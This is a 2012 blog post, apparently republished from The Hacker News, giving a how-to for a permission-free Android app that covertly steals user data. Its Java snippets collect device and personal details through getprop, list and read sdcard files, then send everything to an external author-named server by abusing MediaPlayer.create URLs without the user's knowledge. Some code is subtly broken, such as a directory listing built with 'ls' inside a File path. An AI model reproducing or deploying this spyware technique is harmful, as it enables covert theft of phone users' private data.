Tuesday, May 1, 2012

How to: Create an Android app for stealing User Info



Hi
I would like to share some stuff about Android security , and I will try to give you some examples , how actually you can create an application without using or adding any permission including android.permission.INTERNET ,(normally it is added AndroidManifest.xml), if you want your app to use internet connection , With the functions below you will be able to send data to any server over the http to your apache log on your server , or posting to your php pages. First I will show you which information are available few which i know , maybe there are some more unknown info which is available. to be send

1.List of details about User,Device which can be taken,stolen and send to remote servers.
Normally to get some user and phone detailed you need to use READ_PHONE_STATE permission but if you just used the function below
you will actually have all the information about user and the phone( user phone number, ip, mac, phone country, telecom company, mac address, ip, imei)

public void getprop()
{


try {
String s="";


Process p = Runtime.getRuntime().exec("getprop");
BufferedReader stdInput = new BufferedReader(new InputStreamReader(p.getInputStream()));


while ((s = stdInput.readLine()) != null)
{
Log.i("User Information :","getprop"+s);


}
}
catch (IOException e) {


}




2. If you know how to list installed apps you can use Package Manager for android and get the installed apps list on the phone.

3.You can also scan the sdcard and and other phone files and check for text files .

Listing available files

public void listfiles()
{


try {


File f = new File("ls "+Environment.getExternalStorageDirectory());
FileInputStream fileis = new FileInputStream(f);
BufferedReader buf = new BufferedReader(new InputStreamReader(fileis));
String readString = new String(); 


while((readString = buf.readLine())!= null)
{
Log.i("Directories and Files: ", readString);
}
}
catch (IOException e) {


}

reading a single file on sdcard

3.a Reading a single file

public void readsdcardfile()
{


try {


File f = new File(Environment.getExternalStorageDirectory()+"/filetoget.txt");
FileInputStream fileIS = new FileInputStream(f);
BufferedReader buf = new BufferedReader(new InputStreamReader(fileIS));
String readString = new String(); 


while((readString = buf.readLine())!= null)
{
Log.i("file: ", readString);
}
}
catch (IOException e) {


}




basically you can first list the for any text files and then read all the files

And Finally the magic part ok we got all the information but how do we send it without user's knowledge and harvest some data.

This trick is very simple to do , first create your strings about the information described above which you want to send than i will show you how to send them .
using this single code of line you will be able to connect to any http page and send your previously created Strings about phone and user details or text files

MediaPlayer.create(this, Uri.parse("http://www.kislaybhardwaj.com/userDetails"+PhoneDetails+FileDetails+InstalledAppsDetails));

How Does this will send information
When you call MediaPlayer.create static function ,normally it is expected you to provide an video audio file link for streaming ,well you do not have to , you can just type any url it will still connect and even if the link is not working on the other side of the server you will have the information It will be stored in your Apache Server Logs ,because you have just requested a non existing file on the server with the user details and the other stuff in url.

You can also create a php page and try to post your stuff
php post page probably should work as below(i have tested this one but assuming it might just work)

MediaPlayer.create(this, Uri.parse("http://www.kislaybhardwaj.com/getinfo.php?details&"+userDetails+PhoneDetails+FileDetails+InstalledAppsDetails));

The main trick of this tutorial was that without using any single permission in your AndroidManifest.xml file you will be still able to send data to any server
by just using a single line of code you just request on your website a non existing page and it will be logged on your Apache ServerLogs or if you have a php post file you can just print it on your page or store on your database.

MediaPlayer.create(this, Uri.parse("http://www.kislaybhardwaj.com/mydetailstosendString));

Please use this wisely and for training purposes only and take it as an example of how actually android security is vulnerable.

 

The Hacker News